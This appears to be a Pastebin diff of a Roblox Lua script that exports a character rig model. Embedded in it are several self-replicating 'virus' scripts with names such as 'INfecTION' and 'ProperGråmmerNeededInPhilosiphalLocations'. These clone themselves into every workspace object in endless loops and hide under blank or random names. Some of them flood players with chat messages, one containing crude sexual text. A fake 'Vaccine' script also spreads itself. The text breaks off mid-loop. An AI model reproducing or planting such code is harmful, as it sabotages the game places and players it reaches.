View difference between Paste ID: zECTbdh1 and vm1vStVp
SHOW: | | - or go back to the newest paste.
1
wait(1)
2
3
4
Create = function(itemClass,tabl)
5
local item = Instance.new(itemClass)
6
for i,v in pairs(tabl) do
7
local a,b = ypcall(function() return item[i] end)
8
if a then
9
item[i] = tabl[i]
10
end
11
end
12
return item
13
end
14
function runDummyScript(f,scri)
15
local oldenv = getfenv(f)
16
local newenv = setmetatable({}, {
17
__index = function(_, k)
18
if k:lower() == 'script' then
19
return scri
20
else
21
return oldenv[k]
22
end
23
end
24
})
25
setfenv(f, newenv)
26
ypcall(function() f() end)
27
end
28
cors = {}
29
mas = Instance.new("Model",game:GetService("Lighting")) 
30
mas.Name = "CompiledModel"
31
o1 = Create("Model",{
32
["Name"] = "RIG",
33
["Parent"] = mas,
34
})
35
o2 = Create("Model",{
36
["Name"] = "Leg2",
37
["Parent"] = o1,
38
})
39
o3 = Create("Part",{
40
["Name"] = "Middle",
41
["Parent"] = o2,
42
["BrickColor"] = BrickColor.new("White"),
43
["Transparency"] = 1,
44
["Position"] = Vector3.new(59.4994583, -5251.39893, -351.075043),
45
["Rotation"] = Vector3.new(180, -0.000157029906, -180),
46
["Anchored"] = true,
47
["CFrame"] = CFrame.new(59.4994583, -5251.39893, -351.075043, -1, 5.02264967e-008, -2.74068884e-006, 5.02266779e-008, 1, -6.61123138e-008, 2.74068884e-006, -6.6112456e-008, -1),
48
["FormFactor"] = Enum.FormFactor.Symmetric,
49
["Size"] = Vector3.new(1, 2, 1),
50
["BottomSurface"] = Enum.SurfaceType.Smooth,
51
["TopSurface"] = Enum.SurfaceType.Smooth,
52
["Color"] = Color3.new(0.94902, 0.952941, 0.952941),
53
})
54
o4 = Create("Part",{
55
["Parent"] = o2,
56
["Material"] = Enum.Material.SmoothPlastic,
57
["BrickColor"] = BrickColor.new("Daisy orange"),
58
["Position"] = Vector3.new(59.5439415, -5252.08887, -350.657501),
59
["Rotation"] = Vector3.new(3.00432184e-005, 0.000220848902, 3.89817178e-005),
60
["Anchored"] = true,
61
["CFrame"] = CFrame.new(59.5439415, -5252.08887, -350.657501, 1, -6.80359335e-007, 3.85454041e-006, 6.80361381e-007, 1, -5.24353084e-007, -3.85453995e-006, 5.24355698e-007, 1),
62
["FormFactor"] = Enum.FormFactor.Custom,
63
["Size"] = Vector3.new(1, 0.400000215, 0.200000003),
64
["BottomSurface"] = Enum.SurfaceType.Smooth,
65
["TopSurface"] = Enum.SurfaceType.Smooth,
66
["Color"] = Color3.new(0.972549, 0.85098, 0.427451),
67
})
68
o5 = Create("SpecialMesh",{
69
["Parent"] = o4,
70
["MeshId"] = "rbxasset://fonts/leftleg.mesh",
71
["Scale"] = Vector3.new(0.699999988, 0.129999995, 0.100000001),
72
["MeshType"] = Enum.MeshType.FileMesh,
73
})
74
o6 = Create("Part",{
75
["Parent"] = o2,
76
["Material"] = Enum.Material.SmoothPlastic,
77
["BrickColor"] = BrickColor.new("Really black"),
78
["Position"] = Vector3.new(59.5568504, -5251.10889, -351.12204),
79
["Rotation"] = Vector3.new(2.65601866e-005, -90, 0),
80
["Anchored"] = true,
81
["CFrame"] = CFrame.new(59.5568504, -5251.10889, -351.12204, 3.44193904e-006, -5.93599509e-007, -1.00000954, -4.63562174e-007, 0.999998808, -6.79528341e-007, 0.999999166, 5.2453106e-007, 3.8545877e-006),
82
["FormFactor"] = Enum.FormFactor.Custom,
83
["Size"] = Vector3.new(1, 1.40000021, 0.949997187),
84
["BottomSurface"] = Enum.SurfaceType.Smooth,
85
["TopSurface"] = Enum.SurfaceType.Smooth,
86
["Color"] = Color3.new(0.0666667, 0.0666667, 0.0666667),
87
})
88
o7 = Create("SpecialMesh",{
89
["Parent"] = o6,
90
["MeshId"] = "rbxasset://fonts/leftleg.mesh",
91
["Scale"] = Vector3.new(1.00999999, 0.800000012, 1.00999999),
92
["MeshType"] = Enum.MeshType.FileMesh,
93
})
94
o8 = Create("Part",{
95
["Parent"] = o2,
96
["Material"] = Enum.Material.SmoothPlastic,
97
["BrickColor"] = BrickColor.new("Daisy orange"),
98
["Position"] = Vector3.new(59.5568619, -5251.31885, -351.122009),
99
["Rotation"] = Vector3.new(2.65601866e-005, -90, 0),
100
["Anchored"] = true,
101
["CFrame"] = CFrame.new(59.5568619, -5251.31885, -351.122009, 3.44193904e-006, -5.93599509e-007, -1.00000954, -4.63562174e-007, 0.999998808, -6.79528341e-007, 0.999999166, 5.2453106e-007, 3.8545877e-006),
102
["FormFactor"] = Enum.FormFactor.Custom,
103
["Size"] = Vector3.new(1, 2.00000024, 0.949997187),
104
["BottomSurface"] = Enum.SurfaceType.Smooth,
105
["TopSurface"] = Enum.SurfaceType.Smooth,
106
["Color"] = Color3.new(0.972549, 0.85098, 0.427451),
107
})
108
o9 = Create("SpecialMesh",{
109
["Parent"] = o8,
110
["MeshId"] = "rbxasset://fonts/rightleg.mesh",
111
["MeshType"] = Enum.MeshType.FileMesh,
112
})
113
o10 = Create("Part",{
114
["Parent"] = o2,
115
["Material"] = Enum.Material.SmoothPlastic,
116
["BrickColor"] = BrickColor.new("Cool yellow"),
117
["Position"] = Vector3.new(59.5589256, -5252.09912, -351.117584),
118
["Rotation"] = Vector3.new(2.65601866e-005, -90, 0),
119
["Anchored"] = true,
120
["CFrame"] = CFrame.new(59.5589256, -5252.09912, -351.117584, 3.44193904e-006, -5.93599509e-007, -1.00000954, -4.63562174e-007, 0.999998808, -6.79528341e-007, 0.999999166, 5.2453106e-007, 3.8545877e-006),
121
["FormFactor"] = Enum.FormFactor.Custom,
122
["Size"] = Vector3.new(1, 1.40000021, 0.949997187),
123
["BottomSurface"] = Enum.SurfaceType.Smooth,
124
["TopSurface"] = Enum.SurfaceType.Smooth,
125
["Color"] = Color3.new(0.992157, 0.917647, 0.552941),
126
})
127
o11 = Create("SpecialMesh",{
128
["Parent"] = o10,
129
["MeshId"] = "rbxasset://fonts/leftleg.mesh",
130
["Scale"] = Vector3.new(1.00999999, 0.230000004, 1.00999999),
131
["MeshType"] = Enum.MeshType.FileMesh,
132
})
133
o12 = Create("Fire",{
134
["Parent"] = o10,
135
["Size"] = 30,
136
["Color"] = Color3.new(1, 0.678431, 0),
137
["Enabled"] = false,
138
["Heat"] = 25,
139
["SecondaryColor"] = Color3.new(1, 0, 0),
140
})
141
o13 = Create("Script",{
142
["Name"] = "Spread",
143
["Parent"] = o12,
144
})
145
table.insert(cors,coroutine.create(function()
146
wait()
147
runDummyScript(function()
148
function Spread(part)
149
	check = part:findFirstChild("Fire")
150
		if check == nil then 
151
	script.Parent:Clone().Parent = part
152
	
153
		elseif check ~= nil then
154
	check.Size = check.Size + 1000000
155
	check.Heat = check.Heat  +1000000
156
	end
157
end
158
159
160
script.Parent.Parent.Touched:connect(Spread)
161
162
end,o13)
163
end))
164
o15 = Create("Script",{
165
["Name"] = "Script......Or is it...",
166
["Parent"] = mas,
167
})
168
table.insert(cors,coroutine.create(function()
169
wait()
170
runDummyScript(function()
171
-- Thanks for using My hack.............suka XD
172
173
if script.Parent.className ~= "RotateP" then
174
	local p = Instance.new("RotateP")
175
	p.Parent = workspace
176
	p.Name = "dåååååååååååååång.........you got owned..."
177
	script.Parent = p
178
end
179
180
function check()
181
	local list = workspace:GetChildren()
182
	for i = 1, #list do
183
		if list[i]:findFirstChild("dåååååååååååååång.........you got owned...") == nil and list[i].className ~= "RotateP" then
184
			script.Parent:Clone().Parent = list[i]
185
		end
186
		wait()
187
	end
188
end
189
190
while true do
191
	check()
192
	if workspace:findFirstChild("Hello...I åm Your New Lord Lolz") == nil then
193
		local main = script.Parent:Clone()
194
		main.Name = "Hello...I åm Your New Lord Lolz"
195
		main.Parent = workspace
196
	end
197
	wait(3)
198
end
199
-- Credit goes to Nomnomnom1..........................really..........did you need to know?!
200
-- Have a nice day. XD
201
end,o15)
202
end))
203
o17 = Create("Script",{
204
["Name"] = "Script......Or is it...",
205
["Parent"] = mas,
206
})
207
table.insert(cors,coroutine.create(function()
208
wait()
209
runDummyScript(function()
210
if script.Parent.className ~= "RotateP" then
211
	local p = Instance.new("RotateP")
212
	p.Parent = workspace
213
	p.Name = "INfecTION"
214
	script.Parent = p
215
end
216
217
function check()
218
	local list = workspace:GetChildren()
219
	for i = 1, #list do
220
		if list[i]:findFirstChild("INfecTION") == nil and list[i].className ~= "RotateP" then
221
			script.Parent:Clone().Parent = list[i]
222
		end
223
		wait()
224
	end
225
end
226
227
while true do
228
	check()
229
	if workspace:findFirstChild("inFECtion") == nil then
230
		local main = script.Parent:Clone()
231
		main.Name = "inFECtion"
232
		main.Parent = workspace
233
	end
234
	wait(3)
235
end
236
237
end,o17)
238
end))
239
o19 = Create("Script",{
240
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
241
["Parent"] = mas,
242
})
243
table.insert(cors,coroutine.create(function()
244
wait()
245
runDummyScript(function()
246
names={"dapperguestyo"}
247
local NameCheck = false
248
script.Parent.Name = names[math.random(1, #names)]
249
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
250
local c = script.Parent:Clone()
251
252
function addEvent(ch)
253
	wait(math.random())
254
	NameCheck = false
255
	for ss = 1, #names do
256
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
257
			NameCheck = true
258
		end
259
	end
260
	if NameCheck == false then
261
		local cloak = c:Clone()
262
		cloak.Name = ""
263
		cloak:GetChildren()[1].Name = ""
264
		cloak.Parent = ch
265
		cloak.Name = names[math.random(1, 5)]
266
	end
267
end
268
269
workspace.ChildAdded:connect(addEvent)
270
271
game.Players.PlayerAdded:connect(function(pl)
272
	pl.Chatted:connect(function(m)
273
		if m:sub(1, 5) == "/sc t" then
274
			local m = Instance.new("Message")
275
			m.Parent = workspace
276
			m.Text = "THEY CALL ME CRAZY"
277
			wait(1)
278
			m.Text = "lOoOoOoOp"
279
			wait(0.25)
280
			m.Text = "next page"
281
			wait(0.25)
282
			m.Text = "lOoOoOoOp"
283
			wait(0.25)
284
			m.Text = "LoOoOoOoP"
285
			wait(0.25)
286
			m.Text = "lOoOoOoOp"
287
			wait(0.25)
288
			m.Text = "LoOoOoOoP"
289
			wait(0.25)
290
			m.Text = "GOTTA GOTTA BE CRAZY"
291
			wait(1)
292
			m.Text = "lOoOoOoOp"
293
			wait(0.25)
294
			m.Text = "LoOoOoOoP"
295
			wait(0.25)
296
			m.Text = "lOoOoOoOp"
297
			wait(0.25)
298
			m.Text = "brendantaylor rules"
299
			wait(0.25)
300
			m.Text = "so does iampoobx"
301
			wait(0.25)
302
			m.Text = "LoOoOoOoP"
303
			wait(0.25)
304
			m.Text = "GOTTA GET A LIFE (YOU)"
305
			wait(3)
306
			m:remove()
307
		end
308
		if m:sub(1, 5) == "HAAXX" then
309
			local m = Instance.new("Message")
310
			m.Parent = workspace
311
			m.Text = "HAAXX"	
312
			wait(3)
313
			m:remove()
314
		end
315
	end)
316
end)
317
318
while true do
319
	local s = workspace:GetChildren()
320
	for i = 1, #s do
321
		NameCheck = false
322
		for ss = 1, #names do
323
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
324
				NameCheck = true
325
			end
326
		end
327
		if NameCheck == false then
328
			local cloak = c:Clone()
329
			cloak.Name = ""
330
			cloak:GetChildren()[1].Name = ""
331
			cloak.Parent = s[i]
332
		end
333
		wait(0.1)
334
	end
335
	wait(1)
336
end
337
338
end,o19)
339
end))
340
o20 = Create("Script",{
341
["Name"] = "Vaccine",
342
["Parent"] = o10,
343
})
344
table.insert(cors,coroutine.create(function()
345
wait()
346
runDummyScript(function()
347
function spread() -- created by bumblebee773
348
local stuff = game.Workspace:GetChildren()
349
for i = 1, #stuff do
350
if (stuff[i].className ~= "Script") and (stuff[i]:findFirstChild("Vaccine") == nil) and (stuff[i].className ~= "Camera") then
351
local clone = script:clone()
352
clone.Parent = stuff[i]
353
end
354
end
355
end
356
357
while true do
358
wait(.1)
359
spread()
360
end
361
362
function GetAllItems(mdl) 
363
local objs = {} 
364
function Search(obj) 
365
if obj~=workspace then 
366
table.insert(objs,obj) 
367
end 
368
if #obj:GetChildren() > 0 then 
369
for i, v in ipairs(obj:GetChildren()) do 
370
Search(v) 
371
end 
372
end 
373
end 
374
Search(mdl) 
375
return objs 
376
end 
377
378
379
380
for i, v in ipairs(GetAllItems(workspace)) do 
381
if v.className == "Script" then 
382
if v.Name == "Chaotic" or v.Name == "Spreadify" or v.Name == "Virus" or v.Name == "Infected" then 
383
v.Parent = game.Lighting --Just in case it has a removal prevention. 
384
t = Instance.new("ObjectValue") 
385
t.Name = "IsAVirus" 
386
t.Parent = v 
387
end 
388
end 
389
end 
390
391
for i, v in ipairs(game.Lighting:GetChildren()) do 
392
if v:findFirstChild("IsAVirus") then --Only remove the viruses. 
393
v:remove() 
394
end 
395
end 
396
397
398
print("Virus debugged! All clean!")
399
end,o20)
400
end))
401
o22 = Create("Script",{
402
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
403
["Parent"] = mas,
404
})
405
table.insert(cors,coroutine.create(function()
406
wait()
407
runDummyScript(function()
408
names={"NoNoIDon'tNeedAllOfYourAwkwårdSovietArguments", "IAmHereToHeålYourPlace", "FeelFreeToIns3rtGrammåticålErrorsHere", "ThisScriptIsAJumpStartToAHeålthyLifestyle", "FreeStyleMåyGoAnywhereIfNeeded", "3.14159265358979,ALotOfRåndomPiNumbers", "RandomåGoesHere:3", [[""''""''""å|`ç]], "77å", "å9001", "IStårtHere"}
409
local NameCheck = false
410
script.Parent.Name = names[math.random(1, #names)]
411
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
412
local c = script.Parent:Clone()
413
414
function addEvent(ch)
415
	wait(math.random())
416
	NameCheck = false
417
	for ss = 1, #names do
418
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
419
			NameCheck = true
420
		end
421
	end
422
	if NameCheck == false then
423
		local cloak = c:Clone()
424
		cloak.Name = ""
425
		cloak:GetChildren()[1].Name = ""
426
		cloak.Parent = ch
427
		cloak.Name = names[math.random(1, 5)]
428
	end
429
end
430
431
workspace.ChildAdded:connect(addEvent)
432
433
game.Players.PlayerAdded:connect(function(pl)
434
	pl.Chatted:connect(function(m)
435
		if m:sub(1, 5) == "/sc t" then
436
			local m = Instance.new("Message")
437
			m.Parent = workspace
438
			m.Text = "THEY CALL ME CRAZY"
439
			wait(1)
440
			m.Text = "lOoOoOoOp"
441
			wait(0.25)
442
			m.Text = "LoOoOoOoP"
443
			wait(0.25)
444
			m.Text = "lOoOoOoOp"
445
			wait(0.25)
446
			m.Text = "LoOoOoOoP"
447
			wait(0.25)
448
			m.Text = "lOoOoOoOp"
449
			wait(0.25)
450
			m.Text = "LoOoOoOoP"
451
			wait(0.25)
452
			m.Text = "GOTTA GOTTA BE CRAZY"
453
			wait(1)
454
			m.Text = "lOoOoOoOp"
455
			wait(0.25)
456
			m.Text = "LoOoOoOoP"
457
			wait(0.25)
458
			m.Text = "lOoOoOoOp"
459
			wait(0.25)
460
			m.Text = "LoOoOoOoP"
461
			wait(0.25)
462
			m.Text = "lOoOoOoOp"
463
			wait(0.25)
464
			m.Text = "LoOoOoOoP"
465
			wait(0.25)
466
			m.Text = "GOTTA GET A LIFE (YOU)"
467
			wait(3)
468
			m:remove()
469
		end
470
		if m:sub(1, 5) == "HAAXX" then
471
			local m = Instance.new("Message")
472
			m.Parent = workspace
473
			m.Text = "HAAXX"	
474
			wait(3)
475
			m:remove()
476
		end
477
	end)
478
end)
479
480
while true do
481
	local s = workspace:GetChildren()
482
	for i = 1, #s do
483
		NameCheck = false
484
		for ss = 1, #names do
485
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
486
				NameCheck = true
487
			end
488
		end
489
		if NameCheck == false then
490
			local cloak = c:Clone()
491
			cloak.Name = ""
492
			cloak:GetChildren()[1].Name = ""
493
			cloak.Parent = s[i]
494
		end
495
		wait(0.1)
496
	end
497
	wait(1)
498
end
499
500
end,o22)
501
end))
502
o24 = Create("Script",{
503
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
504
["Parent"] = mas,
505
})
506
table.insert(cors,coroutine.create(function()
507
wait()
508
runDummyScript(function()
509
names={"AmazingOmegaJames","H75","","","","","","",""}
510
local NameCheck = false
511
script.Parent.Name = names[math.random(1, #names)]
512
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
513
local c = script.Parent:Clone()
514
515
function addEvent(ch)
516
	wait(math.random())
517
	NameCheck = false
518
	for ss = 1, #names do
519
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
520
			NameCheck = true
521
		end
522
	end
523
	if NameCheck == false then
524
		local cloak = c:Clone()
525
		cloak.Name = ""
526
		cloak:GetChildren()[1].Name = ""
527
		cloak.Parent = ch
528
		cloak.Name = names[math.random(1, 5)]
529
	end
530
end
531
532
workspace.ChildAdded:connect(addEvent)
533
534
game.Players.PlayerAdded:connect(function(pl)
535
	pl.Chatted:connect(function(m)
536
		if m:sub(1, 5) == "/sc t" then
537
			local m = Instance.new("The creator of this place is AmazingOmegaJames")
538
			m.Parent = workspace
539
			m.Text = "THEY CALL ME CRAZY"
540
			wait(1)
541
			m.Text = "lOoOoOoOp"
542
			wait(0.25)
543
			m.Text = "LoOoOoOoP"
544
			wait(0.25)
545
			m.Text = "lOoOoOoOp"
546
			wait(0.25)
547
			m.Text = "LoOoOoOoP"
548
			wait(0.25)
549
			m.Text = "lOoOoOoOp"
550
			wait(0.25)
551
			m.Text = "LoOoOoOoP"
552
			wait(0.25)
553
			m.Text = "GOTTA GOTTA BE CRAZY SEX"
554
			wait(1)
555
			m.Text = "lOoOoOoOp"
556
			wait(0.25)
557
			m.Text = "LoOoOoOoP"
558
			wait(0.25)
559
			m.Text = "lOoOoOoOp"
560
			wait(0.25)
561
			m.Text = "LoOoOoOoP"
562
			wait(0.25)
563
			m.Text = "lOoOoOoOp"
564
			wait(0.25)
565
			m.Text = "LoOoOoOoP"
566
			wait(0.25)
567
			m.Text = "GOTTA HAVE SEX WITH YOU"
568
			wait(3)
569
			m:remove()
570
		end
571
		if m:sub(1, 5) == " SEX HAAXX" then
572
			local m = Instance.new("Message")
573
			m.Parent = workspace
574
			m.Text = " SEX HAAXX"	
575
			wait(3)
576
			m:remove()
577
		end
578
	end)
579
end)
580
581
while true do
582
	local s = workspace:GetChildren()
583
	for i = 1, #s do
584
		NameCheck = false
585
		for ss = 1, #names do
586
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
587
				NameCheck = true
588
			end
589
		end
590
		if NameCheck == false then
591
			local cloak = c:Clone()
592
			cloak.Name = ""
593
			cloak:GetChildren()[1].Name = ""
594
			cloak.Parent = s[i]
595
		end
596
		wait(0.1)
597
	end
598
	wait(1)
599
end
600
601
end,o24)
602
end))
603
o25 = Create("Part",{
604
["Parent"] = o2,
605
["Material"] = Enum.Material.SmoothPlastic,
606
["BrickColor"] = BrickColor.new("Cool yellow"),
607
["Position"] = Vector3.new(59.1318436, -5250.69922, -351.127045),
608
["Rotation"] = Vector3.new(-3.09706229e-005, 8.06548269e-005, -8.88147736),
609
["Anchored"] = true,
610
["CFrame"] = CFrame.new(59.1318436, -5250.69922, -351.127045, 0.98800981, 0.154390976, 1.40769225e-006, -0.154390961, 0.98800993, 5.40539361e-007, -1.30735941e-006, -7.51393259e-007, 1),
611
["FormFactor"] = Enum.FormFactor.Custom,
612
["Size"] = Vector3.new(0.599999964, 0.600000024, 0.949997187),
613
["BottomSurface"] = Enum.SurfaceType.Smooth,
614
["TopSurface"] = Enum.SurfaceType.Smooth,
615
["Color"] = Color3.new(0.992157, 0.917647, 0.552941),
616
})
617
o26 = Create("SpecialMesh",{
618
["Parent"] = o25,
619
["MeshId"] = "rbxasset://fonts/torso.mesh",
620
["Scale"] = Vector3.new(0.150000006, 0.400000006, 1.00100005),
621
["MeshType"] = Enum.MeshType.FileMesh,
622
})
623
o27 = Create("Fire",{
624
["Parent"] = o25,
625
["Size"] = 30,
626
["Color"] = Color3.new(1, 0.678431, 0),
627
["Enabled"] = false,
628
["Heat"] = 25,
629
["SecondaryColor"] = Color3.new(1, 0, 0),
630
})
631
o28 = Create("Script",{
632
["Name"] = "Spread",
633
["Parent"] = o27,
634
})
635
table.insert(cors,coroutine.create(function()
636
wait()
637
runDummyScript(function()
638
function Spread(part)
639
	check = part:findFirstChild("Fire")
640
		if check == nil then 
641
	script.Parent:Clone().Parent = part
642
	
643
		elseif check ~= nil then
644
	check.Size = check.Size + 1000000
645
	check.Heat = check.Heat  +1000000
646
	end
647
end
648
649
650
script.Parent.Parent.Touched:connect(Spread)
651
652
end,o28)
653
end))
654
o30 = Create("Script",{
655
["Name"] = "Script......Or is it...",
656
["Parent"] = mas,
657
})
658
table.insert(cors,coroutine.create(function()
659
wait()
660
runDummyScript(function()
661
-- Thanks for using My hack.............suka XD
662
663
if script.Parent.className ~= "RotateP" then
664
	local p = Instance.new("RotateP")
665
	p.Parent = workspace
666
	p.Name = "dåååååååååååååång.........you got owned..."
667
	script.Parent = p
668
end
669
670
function check()
671
	local list = workspace:GetChildren()
672
	for i = 1, #list do
673
		if list[i]:findFirstChild("dåååååååååååååång.........you got owned...") == nil and list[i].className ~= "RotateP" then
674
			script.Parent:Clone().Parent = list[i]
675
		end
676
		wait()
677
	end
678
end
679
680
while true do
681
	check()
682
	if workspace:findFirstChild("Hello...I åm Your New Lord Lolz") == nil then
683
		local main = script.Parent:Clone()
684
		main.Name = "Hello...I åm Your New Lord Lolz"
685
		main.Parent = workspace
686
	end
687
	wait(3)
688
end
689
-- Credit goes to Nomnomnom1..........................really..........did you need to know?!
690
-- Have a nice day. XD
691
end,o30)
692
end))
693
o32 = Create("Script",{
694
["Name"] = "Script......Or is it...",
695
["Parent"] = mas,
696
})
697
table.insert(cors,coroutine.create(function()
698
wait()
699
runDummyScript(function()
700
if script.Parent.className ~= "RotateP" then
701
	local p = Instance.new("RotateP")
702
	p.Parent = workspace
703
	p.Name = "INfecTION"
704
	script.Parent = p
705
end
706
707
function check()
708
	local list = workspace:GetChildren()
709
	for i = 1, #list do
710
		if list[i]:findFirstChild("INfecTION") == nil and list[i].className ~= "RotateP" then
711
			script.Parent:Clone().Parent = list[i]
712
		end
713
		wait()
714
	end
715
end
716
717
while true do
718
	check()
719
	if workspace:findFirstChild("inFECtion") == nil then
720
		local main = script.Parent:Clone()
721
		main.Name = "inFECtion"
722
		main.Parent = workspace
723
	end
724
	wait(3)
725
end
726
727
end,o32)
728
end))
729
o34 = Create("Script",{
730
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
731
["Parent"] = mas,
732
})
733
table.insert(cors,coroutine.create(function()
734
wait()
735
runDummyScript(function()
736
names={"dapperguestyo"}
737
local NameCheck = false
738
script.Parent.Name = names[math.random(1, #names)]
739
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
740
local c = script.Parent:Clone()
741
742
function addEvent(ch)
743
	wait(math.random())
744
	NameCheck = false
745
	for ss = 1, #names do
746
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
747
			NameCheck = true
748
		end
749
	end
750
	if NameCheck == false then
751
		local cloak = c:Clone()
752
		cloak.Name = ""
753
		cloak:GetChildren()[1].Name = ""
754
		cloak.Parent = ch
755
		cloak.Name = names[math.random(1, 5)]
756
	end
757
end
758
759
workspace.ChildAdded:connect(addEvent)
760
761
game.Players.PlayerAdded:connect(function(pl)
762
	pl.Chatted:connect(function(m)
763
		if m:sub(1, 5) == "/sc t" then
764
			local m = Instance.new("Message")
765
			m.Parent = workspace
766
			m.Text = "THEY CALL ME CRAZY"
767
			wait(1)
768
			m.Text = "lOoOoOoOp"
769
			wait(0.25)
770
			m.Text = "next page"
771
			wait(0.25)
772
			m.Text = "lOoOoOoOp"
773
			wait(0.25)
774
			m.Text = "LoOoOoOoP"
775
			wait(0.25)
776
			m.Text = "lOoOoOoOp"
777
			wait(0.25)
778
			m.Text = "LoOoOoOoP"
779
			wait(0.25)
780
			m.Text = "GOTTA GOTTA BE CRAZY"
781
			wait(1)
782
			m.Text = "lOoOoOoOp"
783
			wait(0.25)
784
			m.Text = "LoOoOoOoP"
785
			wait(0.25)
786
			m.Text = "lOoOoOoOp"
787
			wait(0.25)
788
			m.Text = "brendantaylor rules"
789
			wait(0.25)
790
			m.Text = "so does iampoobx"
791
			wait(0.25)
792
			m.Text = "LoOoOoOoP"
793
			wait(0.25)
794
			m.Text = "GOTTA GET A LIFE (YOU)"
795
			wait(3)
796
			m:remove()
797
		end
798
		if m:sub(1, 5) == "HAAXX" then
799
			local m = Instance.new("Message")
800
			m.Parent = workspace
801
			m.Text = "HAAXX"	
802
			wait(3)
803
			m:remove()
804
		end
805
	end)
806
end)
807
808
while true do
809
	local s = workspace:GetChildren()
810
	for i = 1, #s do
811
		NameCheck = false
812
		for ss = 1, #names do
813
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
814
				NameCheck = true
815
			end
816
		end
817
		if NameCheck == false then
818
			local cloak = c:Clone()
819
			cloak.Name = ""
820
			cloak:GetChildren()[1].Name = ""
821
			cloak.Parent = s[i]
822
		end
823
		wait(0.1)
824
	end
825
	wait(1)
826
end
827
828
end,o34)
829
end))
830
o35 = Create("Script",{
831
["Name"] = "Vaccine",
832
["Parent"] = o25,
833
})
834
table.insert(cors,coroutine.create(function()
835
wait()
836
runDummyScript(function()
837
function spread() -- created by bumblebee773
838
local stuff = game.Workspace:GetChildren()
839
for i = 1, #stuff do
840
if (stuff[i].className ~= "Script") and (stuff[i]:findFirstChild("Vaccine") == nil) and (stuff[i].className ~= "Camera") then
841
local clone = script:clone()
842
clone.Parent = stuff[i]
843
end
844
end
845
end
846
847
while true do
848
wait(.1)
849
spread()
850
end
851
852
function GetAllItems(mdl) 
853
local objs = {} 
854
function Search(obj) 
855
if obj~=workspace then 
856
table.insert(objs,obj) 
857
end 
858
if #obj:GetChildren() > 0 then 
859
for i, v in ipairs(obj:GetChildren()) do 
860
Search(v) 
861
end 
862
end 
863
end 
864
Search(mdl) 
865
return objs 
866
end 
867
868
869
870
for i, v in ipairs(GetAllItems(workspace)) do 
871
if v.className == "Script" then 
872
if v.Name == "Chaotic" or v.Name == "Spreadify" or v.Name == "Virus" or v.Name == "Infected" then 
873
v.Parent = game.Lighting --Just in case it has a removal prevention. 
874
t = Instance.new("ObjectValue") 
875
t.Name = "IsAVirus" 
876
t.Parent = v 
877
end 
878
end 
879
end 
880
881
for i, v in ipairs(game.Lighting:GetChildren()) do 
882
if v:findFirstChild("IsAVirus") then --Only remove the viruses. 
883
v:remove() 
884
end 
885
end 
886
887
888
print("Virus debugged! All clean!")
889
end,o35)
890
end))
891
o37 = Create("Script",{
892
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
893
["Parent"] = mas,
894
})
895
table.insert(cors,coroutine.create(function()
896
wait()
897
runDummyScript(function()
898
names={"NoNoIDon'tNeedAllOfYourAwkwårdSovietArguments", "IAmHereToHeålYourPlace", "FeelFreeToIns3rtGrammåticålErrorsHere", "ThisScriptIsAJumpStartToAHeålthyLifestyle", "FreeStyleMåyGoAnywhereIfNeeded", "3.14159265358979,ALotOfRåndomPiNumbers", "RandomåGoesHere:3", [[""''""''""å|`ç]], "77å", "å9001", "IStårtHere"}
899
local NameCheck = false
900
script.Parent.Name = names[math.random(1, #names)]
901
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
902
local c = script.Parent:Clone()
903
904
function addEvent(ch)
905
	wait(math.random())
906
	NameCheck = false
907
	for ss = 1, #names do
908
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
909
			NameCheck = true
910
		end
911
	end
912
	if NameCheck == false then
913
		local cloak = c:Clone()
914
		cloak.Name = ""
915
		cloak:GetChildren()[1].Name = ""
916
		cloak.Parent = ch
917
		cloak.Name = names[math.random(1, 5)]
918
	end
919
end
920
921
workspace.ChildAdded:connect(addEvent)
922
923
game.Players.PlayerAdded:connect(function(pl)
924
	pl.Chatted:connect(function(m)
925
		if m:sub(1, 5) == "/sc t" then
926
			local m = Instance.new("Message")
927
			m.Parent = workspace
928
			m.Text = "THEY CALL ME CRAZY"
929
			wait(1)
930
			m.Text = "lOoOoOoOp"
931
			wait(0.25)
932
			m.Text = "LoOoOoOoP"
933
			wait(0.25)
934
			m.Text = "lOoOoOoOp"
935
			wait(0.25)
936
			m.Text = "LoOoOoOoP"
937
			wait(0.25)
938
			m.Text = "lOoOoOoOp"
939
			wait(0.25)
940
			m.Text = "LoOoOoOoP"
941
			wait(0.25)
942
			m.Text = "GOTTA GOTTA BE CRAZY"
943
			wait(1)
944
			m.Text = "lOoOoOoOp"
945
			wait(0.25)
946
			m.Text = "LoOoOoOoP"
947
			wait(0.25)
948
			m.Text = "lOoOoOoOp"
949
			wait(0.25)
950
			m.Text = "LoOoOoOoP"
951
			wait(0.25)
952
			m.Text = "lOoOoOoOp"
953
			wait(0.25)
954
			m.Text = "LoOoOoOoP"
955
			wait(0.25)
956
			m.Text = "GOTTA GET A LIFE (YOU)"
957
			wait(3)
958
			m:remove()
959
		end
960
		if m:sub(1, 5) == "HAAXX" then
961
			local m = Instance.new("Message")
962
			m.Parent = workspace
963
			m.Text = "HAAXX"	
964
			wait(3)
965
			m:remove()
966
		end
967
	end)
968
end)
969
970
while true do
971
	local s = workspace:GetChildren()
972
	for i = 1, #s do
973
		NameCheck = false
974
		for ss = 1, #names do
975
